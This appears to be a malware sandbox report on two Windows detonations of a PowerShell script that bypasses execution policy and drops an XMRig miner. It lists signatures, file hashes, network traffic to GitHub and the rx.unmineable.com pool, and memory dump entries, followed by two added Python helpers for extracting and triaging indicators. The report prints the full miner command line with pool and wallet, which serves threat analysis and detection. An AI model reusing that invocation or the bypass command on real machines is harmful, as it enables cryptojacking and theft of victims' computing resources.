memory/4932-71-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-72-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-73-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-74-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-75-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-76-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-77-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-78-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-79-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-80-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-81-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-82-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-83-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-84-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-85-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-86-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-87-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-88-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-89-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-90-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-91-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-92-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-93-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-94-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-95-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-96-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-97-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-98-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-99-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-100-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-101-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-102-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-103-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-104-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-105-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-106-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-107-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-108-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-109-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-110-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-111-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-112-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-113-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-114-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-115-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-116-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

memory/4932-117-0x00007FF66C560000-0x00007FF66D193000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:39

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1744s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
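
The xmrig command line above recurs unchanged in every detonation on this page, so the pool, wallet and worker name inside it are the indicators worth pivoting on. The following Python is an added example for this report, not sandbox output and not the miner's own code: it tokenises the Windows command line and pulls those fields out. The flag aliases, the base58 shape check for a Monero address, and the COIN:address.worker split (the unMineable user convention) are the author's assumptions, not something the report states.

```python
"""Pull mining IOCs out of the xmrig command line recorded above.

Added example for this report, not tooling from the sandbox. The flag
aliases and the Monero address shape check are assumptions noted inline.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, asdict
from typing import Optional
from urllib.parse import urlsplit

# Copied verbatim from the behavioral24 process list.
XMRIG_CMDLINE = (
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" -a rx '
    "-o stratum+ssl://rx.unmineable.com:443 "
    "-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF"
    ".unmineable_worker_vilqtiac -p x"
)

# xmrig flag spellings for the fields we care about (assumed subset).
FLAG_ALIASES = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
                "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}

# Monero mainnet standard (4...) and subaddress (8...) forms: 95 base58 chars.
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")


@dataclass
class MinerIOC:
    image: str
    algo: Optional[str]
    pool_scheme: str
    pool_host: str
    pool_port: Optional[int]
    pool_tls: bool
    coin: Optional[str]
    address: str
    worker: Optional[str]
    address_plausible: bool


def win_tokens(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring double quotes.
    shlex in POSIX mode would eat the backslashes in C:\\ paths, so a
    small regex tokenizer is used instead."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_flags(tokens: list[str]) -> dict[str, str]:
    """Collect -a/-o/-u/-p (and --long=value forms) into a dict."""
    out: dict[str, str] = {}
    i = 1  # token 0 is the image path
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--") and "=" in tok:
            flag, value = tok.split("=", 1)
            i += 1
        elif tok in FLAG_ALIASES and i + 1 < len(tokens):
            flag, value = tok, tokens[i + 1]
            i += 2
        else:
            i += 1
            continue
        if flag in FLAG_ALIASES:
            out[FLAG_ALIASES[flag]] = value
    return out


def extract_xmrig_ioc(cmdline: str) -> MinerIOC:
    tokens = win_tokens(cmdline)
    flags = parse_flags(tokens)

    # xmrig accepts bare host:port as well as stratum+tcp:// and stratum+ssl://;
    # urlsplit needs a scheme or it mistakes the host for one.
    url = flags.get("url", "")
    if "://" not in url:
        url = "stratum+tcp://" + url
    parts = urlsplit(url)

    # unMineable convention: COIN:address.worker ; plain pools use address[.worker]
    user = flags.get("user", "")
    coin = None
    if ":" in user:
        coin, user = user.split(":", 1)
    address, _, worker = user.partition(".")

    return MinerIOC(
        image=tokens[0],
        algo=flags.get("algo"),
        pool_scheme=parts.scheme,
        pool_host=parts.hostname or "",
        pool_port=parts.port,
        pool_tls=parts.scheme.endswith(("ssl", "tls")),
        coin=coin,
        address=address,
        worker=worker or None,
        address_plausible=bool(MONERO_ADDR.match(address)),
    )


if __name__ == "__main__":
    for key, value in asdict(extract_xmrig_ioc(XMRIG_CMDLINE)).items():
        print(f"{key:18} {value}")
```

Run against the command line above it reports algorithm rx (RandomX), a TLS stratum pool on port 443, coin XMR, a 95-character wallet that passes the Monero shape check, and the worker suffix unmineable_worker_vilqtiac. The stratum+ssl on 443 is also why the pool connection in the Network table below looks like ordinary HTTPS to 161.35.34.195:443: block on the wallet and pool host, not on the port.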

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3320-0-0x00007FFC5C893000-0x00007FFC5C895000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nya3b3ic.4ho.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3320-9-0x000001F7B3A60000-0x000001F7B3A82000-memory.dmp

memory/3320-10-0x00007FFC5C890000-0x00007FFC5D352000-memory.dmp

memory/3320-11-0x00007FFC5C890000-0x00007FFC5D352000-memory.dmp

memory/3320-12-0x00007FFC5C890000-0x00007FFC5D352000-memory.dmp

memory/3320-14-0x000001F7B3C10000-0x000001F7B3C22000-memory.dmp

memory/3320-15-0x000001F7B3AB0000-0x000001F7B3ABA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1228-46-0x00000297CE3D0000-0x00000297CE3F0000-memory.dmp

memory/1228-47-0x00000297CE420000-0x00000297CE440000-memory.dmp

memory/1228-48-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/3320-49-0x00007FFC5C890000-0x00007FFC5D352000-memory.dmp

memory/1228-51-0x00000297CE460000-0x00000297CE480000-memory.dmp

memory/1228-50-0x00000297CE440000-0x00000297CE460000-memory.dmp

memory/3320-53-0x00007FFC5C893000-0x00007FFC5C895000-memory.dmp

memory/1228-52-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-54-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-57-0x00000297CE460000-0x00000297CE480000-memory.dmp

memory/1228-56-0x00000297CE440000-0x00000297CE460000-memory.dmp

memory/1228-55-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-58-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-59-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-60-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-61-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-62-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-63-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-64-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-65-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-66-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-67-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-68-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-69-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-70-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-71-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-72-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-73-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-74-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-75-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-76-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-77-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-78-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-79-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-80-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-81-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-82-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-83-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-84-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-85-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-86-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-87-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-88-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-89-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-90-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-91-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-92-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-93-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-94-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-95-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-96-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-97-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-98-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-99-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-100-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-101-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-102-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-103-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-104-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-105-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-106-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-107-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-108-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-109-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-110-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-111-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-112-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-113-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-114-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-115-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

memory/1228-116-0x00007FF6CB0B0000-0x00007FF6CBCE3000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:33

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1773s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 matches (description, indicator, process and target not recorded)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
NL 23.62.61.152:443 www.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 152.61.62.23.in-addr.arpa udp
NL 23.62.61.152:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 9.73.50.20.in-addr.arpa udp
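
This Network table mixes three things: the miner's pool traffic, the fetch of the dropped xmrig-6.21.3\xmrig.exe, and noise from the guest itself (reverse lookups of the IPs it talked to, and Windows background traffic to bing.com). The Python below is an added example for this report, not sandbox output or tooling: it buckets the rows by domain family and maps the in-addr.arpa queries back to the IPs they name so the analyst can see which ones merely echo connections already in the table. The category assignments are the author's inferences (GitHub as the payload source, bing.com as OS noise); the report itself only records the connections.

```python
"""Triage the sandbox Network table: which rows are the miner, which are the
payload download, and which are resolver or OS background noise.

Added example for this report, not sandbox output or tooling. The category
suffix lists are the analyst's assumptions, stated inline.
"""
from __future__ import annotations

import ipaddress
from typing import Optional

# Subset of rows copied from the behavioral23 Network table above
# (country, destination, domain, protocol).
NETWORK_ROWS = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 23.62.61.152:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 152.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
"""

# Assumed meaning of each domain family. "mining_pool" comes straight from the
# xmrig -o argument; "payload_delivery" is inferred from the dropped
# xmrig-6.21.3\xmrig.exe (the GitHub release layout); "os_noise" is traffic a
# bare win10/win11 image produces on its own.
CATEGORY_SUFFIXES = {
    "mining_pool": ("unmineable.com",),
    "payload_delivery": ("github.com", "githubusercontent.com"),
    "os_noise": ("bing.com",),
}


def parse_rows(table: str) -> list[dict]:
    rows = []
    for line in table.splitlines():
        if not line.strip():
            continue
        country, dst, domain, proto = line.split()
        ip, _, port = dst.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def ptr_to_ip(name: str) -> Optional[str]:
    """'195.34.35.161.in-addr.arpa' -> '161.35.34.195'; None if not a PTR name."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[:-len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.ip_address(".".join(reversed(octets))))
    except ValueError:
        return None


def classify(domain: str) -> str:
    if ptr_to_ip(domain) is not None:
        return "reverse_lookup"
    for category, suffixes in CATEGORY_SUFFIXES.items():
        if any(domain == s or domain.endswith("." + s) for s in suffixes):
            return category
    return "other"


def triage(table: str) -> dict[str, list[tuple[str, str]]]:
    """Bucket unique (kind, target) pairs by category: kind is 'dns' for a
    resolver query, otherwise 'proto:port' of the actual connection."""
    buckets: dict[str, list[tuple[str, str]]] = {}
    for r in parse_rows(table):
        is_dns = r["port"] == 53 and r["proto"] == "udp"
        entry = ("dns", r["domain"]) if is_dns else (f'{r["proto"]}:{r["port"]}', r["ip"])
        bucket = buckets.setdefault(classify(r["domain"]), [])
        if entry not in bucket:
            bucket.append(entry)
    return buckets


def reverse_lookups_of_contacted_hosts(table: str) -> dict[str, str]:
    """PTR queries whose IP the sample actually connected to. These echo
    connections already in the table and add no new indicator."""
    rows = parse_rows(table)
    contacted = {r["ip"] for r in rows if r["port"] != 53}
    hits: dict[str, str] = {}
    for r in rows:
        ip = ptr_to_ip(r["domain"])
        if ip is not None and ip in contacted:
            hits[r["domain"]] = ip
    return hits


if __name__ == "__main__":
    for category, entries in triage(NETWORK_ROWS).items():
        print(category)
        for kind, target in entries:
            print(f"  {kind:8} {target}")
    print("PTR lookups of contacted hosts:", reverse_lookups_of_contacted_hosts(NETWORK_ROWS))
```

On these rows the only connections that are the sample's own are the two GitHub hosts on 443 and the pool at 161.35.34.195:443; five of the PTR queries resolve to exactly those peers plus the bing.com endpoints, so they are the guest looking up names for hosts already listed, not additional infrastructure. The one PTR that maps to an address absent from the table (52.140.118.28) is left in the reverse_lookup bucket for the analyst to judge rather than being guessed at here.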

Files

memory/1924-0-0x00007FFA35933000-0x00007FFA35935000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zefpig2b.m3d.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1924-10-0x00000239C9CF0000-0x00000239C9D12000-memory.dmp

memory/1924-11-0x00007FFA35930000-0x00007FFA363F1000-memory.dmp

memory/1924-12-0x00007FFA35930000-0x00007FFA363F1000-memory.dmp

memory/1924-14-0x00007FFA35930000-0x00007FFA363F1000-memory.dmp

memory/1924-15-0x00000239C9F80000-0x00000239C9F92000-memory.dmp

memory/1924-16-0x00000239C9F60000-0x00000239C9F6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/808-47-0x0000024375B90000-0x0000024375BB0000-memory.dmp

memory/808-48-0x0000024375BE0000-0x0000024375C00000-memory.dmp

memory/808-49-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-52-0x00000243774D0000-0x00000243774F0000-memory.dmp

memory/808-50-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-51-0x0000024375C00000-0x0000024375C20000-memory.dmp

memory/1924-53-0x00007FFA35933000-0x00007FFA35935000-memory.dmp

memory/1924-54-0x00007FFA35930000-0x00007FFA363F1000-memory.dmp

memory/808-55-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/1924-56-0x00007FFA35930000-0x00007FFA363F1000-memory.dmp

memory/808-57-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-58-0x0000024375C00000-0x0000024375C20000-memory.dmp

memory/808-59-0x00000243774D0000-0x00000243774F0000-memory.dmp

memory/808-60-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-61-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-62-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-63-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

